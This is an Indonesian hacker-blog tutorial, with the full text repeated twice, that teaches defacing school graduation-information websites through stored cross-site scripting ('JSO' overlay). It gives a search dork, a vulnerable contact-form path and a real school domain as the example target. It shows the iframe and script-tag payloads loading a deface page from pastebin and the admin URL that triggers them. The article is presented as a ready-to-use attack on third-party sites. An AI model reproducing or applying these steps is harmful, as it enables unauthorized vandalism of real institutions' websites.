/ / Deface Dengan Metode XSS / JSO

Assalamualaikum Wr.Wb


Deface With JSO Method


Oke Balik Lagi ama Gua ./Exorcism . Kali ini w bakal kasih tau cara deface dengan metode XSS / JSO (JavaScript Overlay) . oke langsung saja bahan2 yang diperlukan yaitu :


  1. Script Deface (Gapunya ? Download Gugel Banyak h3h3)
  2. Script JSO nya : Comot Disini Gan
  3. Dork : intitle:"Aplikasi sistem informasi kelulusan"
  4. Internet + Pc
  5. VPN
  6. Exploit : /index.php?page=contact
  7. Ketamvanan ea :V
oke langsung aja lo ngedorking pake dork diatas udah gua sediain . lalu pilih salah satu target nya . 

Pilih Target lo random
target : http://www.bns.sch.id/un/

Setelah lo pilih target , buka website nya , dan masukkan exploit nya dibelakang url target lo . jadi http://target.com/randomdirectory/index.php?page=contact

Sehingga menjadi http://www.bns.sch.id/un/index.php?page=contact

Tampilan Saat Di exploit
Tampilan Seperti Diatas ??? eitsss jangan seneng dulu .. tampilan tersebut masih 50:50 . artinya ? bisa vuln bisa tidak vuln :p .karna sebagian admin udah nge patch website nya beberapa form submit button nya sudah di nonaktifkan! . oke langkah selanjutnya isi form nya 

untuk nama Lengkap isi terserah mau nick lo kek mau nama doi lo terserah penting jangan nama bapaqloe :v. untuk email isikan dengan cek@gmail.com

nah lalu di form pesan kita isikan dengan script jso kita . download script jso diatas dah ane sediakan . buka sc nya lalu lo edit tuh sc . nah bagian paling penting berada pada <iframe src = "" sampe dengan </iframe> .
 nah source nya itu lo ganti dengan link script deface lo . inget link sc deface ya . jangan link bokep asu :v . klo link bokep baginya ke gua aja :v

contoh  :
<iframe src='http://www.target.com/assets/ckeditor/Scriptdeface.html' height='620px' width='1100px' scrolling='no' frameborder='0'></iframe> .

link kedua nya harus diganti ya bujankkk 1!1!1!

ganti yg di dalam garis merah dengan link sc deface lo 

nah klo udah lo upload tuh script ke pastebin lalu lo view dalam bentuk RAW . lalu lu copy url pastebin nya

tampilan pastebin raw . terus copy url nya 

kemudian tinggal lo isi deh itu form pesan seperti ini : 

<script type="text/javascript" src="link_raw_pastebin"></script>

jadinya akan seperti ini . 

isi kurang lebih seperti ini .

nah kalo udah lo kirim tuh pesannya . lalu akses halaman deface nya . caranya ? tambahin /admin/hubungi.php

contoh : http://target.com/randomdirectory/admin/hubungi.php .
sehingga menjadi http://www.bns.sch.id/un/admin/hubungi.php

dannn BOOOMM . website nya udah kena jso dari script kita ^_^

Website yang terkena script jso 

Kalo boleh gua titip nick yah xD : ./Exorcism

NB : semua aktivitas yg kalian lakukan berkaitan dengan Artikel ini DILUAR TANGGUNG JAWAB SAYA . resiko ditanggung sendiri ya gan :) . 

Jangan Lupa juga cek Channel Yutub Ane sekalian di subskrep ea : Touch Me Senpai ^_^ 

oke sekian Artikel dari saya . bila ada kesalahan kata mohon maaf , saya juga manusia yang tidak luput dari kesalahan . 

Email : Exorcism404@hackermail.com

Wassalamualaikum Wr.Wb


~./Exorcism

Deface Dengan Metode XSS / JSO

Assalamualaikum Wr.Wb


Deface With JSO Method


Oke Balik Lagi ama Gua ./Exorcism . Kali ini w bakal kasih tau cara deface dengan metode XSS / JSO (JavaScript Overlay) . oke langsung saja bahan2 yang diperlukan yaitu :


  1. Script Deface (Gapunya ? Download Gugel Banyak h3h3)
  2. Script JSO nya : Comot Disini Gan
  3. Dork : intitle:"Aplikasi sistem informasi kelulusan"
  4. Internet + Pc
  5. VPN
  6. Exploit : /index.php?page=contact
  7. Ketamvanan ea :V
oke langsung aja lo ngedorking pake dork diatas udah gua sediain . lalu pilih salah satu target nya . 

Pilih Target lo random
target : http://www.bns.sch.id/un/

Setelah lo pilih target , buka website nya , dan masukkan exploit nya dibelakang url target lo . jadi http://target.com/randomdirectory/index.php?page=contact

Sehingga menjadi http://www.bns.sch.id/un/index.php?page=contact

Tampilan Saat Di exploit
Tampilan Seperti Diatas ??? eitsss jangan seneng dulu .. tampilan tersebut masih 50:50 . artinya ? bisa vuln bisa tidak vuln :p .karna sebagian admin udah nge patch website nya beberapa form submit button nya sudah di nonaktifkan! . oke langkah selanjutnya isi form nya 

untuk nama Lengkap isi terserah mau nick lo kek mau nama doi lo terserah penting jangan nama bapaqloe :v. untuk email isikan dengan cek@gmail.com

nah lalu di form pesan kita isikan dengan script jso kita . download script jso diatas dah ane sediakan . buka sc nya lalu lo edit tuh sc . nah bagian paling penting berada pada <iframe src = "" sampe dengan </iframe> .
 nah source nya itu lo ganti dengan link script deface lo . inget link sc deface ya . jangan link bokep asu :v . klo link bokep baginya ke gua aja :v

contoh  :
<iframe src='http://www.target.com/assets/ckeditor/Scriptdeface.html' height='620px' width='1100px' scrolling='no' frameborder='0'></iframe> .

link kedua nya harus diganti ya bujankkk 1!1!1!

ganti yg di dalam garis merah dengan link sc deface lo 

nah klo udah lo upload tuh script ke pastebin lalu lo view dalam bentuk RAW . lalu lu copy url pastebin nya

tampilan pastebin raw . terus copy url nya 

kemudian tinggal lo isi deh itu form pesan seperti ini : 

<script type="text/javascript" src="link_raw_pastebin"></script>

jadinya akan seperti ini . 

isi kurang lebih seperti ini .

nah kalo udah lo kirim tuh pesannya . lalu akses halaman deface nya . caranya ? tambahin /admin/hubungi.php

contoh : http://target.com/randomdirectory/admin/hubungi.php .
sehingga menjadi http://www.bns.sch.id/un/admin/hubungi.php

dannn BOOOMM . website nya udah kena jso dari script kita ^_^

Website yang terkena script jso 

Kalo boleh gua titip nick yah xD : ./Exorcism

NB : semua aktivitas yg kalian lakukan berkaitan dengan Artikel ini DILUAR TANGGUNG JAWAB SAYA . resiko ditanggung sendiri ya gan :) . 

Jangan Lupa juga cek Channel Yutub Ane sekalian di subskrep ea : Touch Me Senpai ^_^ 

oke sekian Artikel dari saya . bila ada kesalahan kata mohon maaf , saya juga manusia yang tidak luput dari kesalahan . 

Email : Exorcism404@hackermail.com

Wassalamualaikum Wr.Wb


~./Exorcism
deface
Load Comments
Subscribe to: Post Comments (Atom)

Subscribe Our Newsletter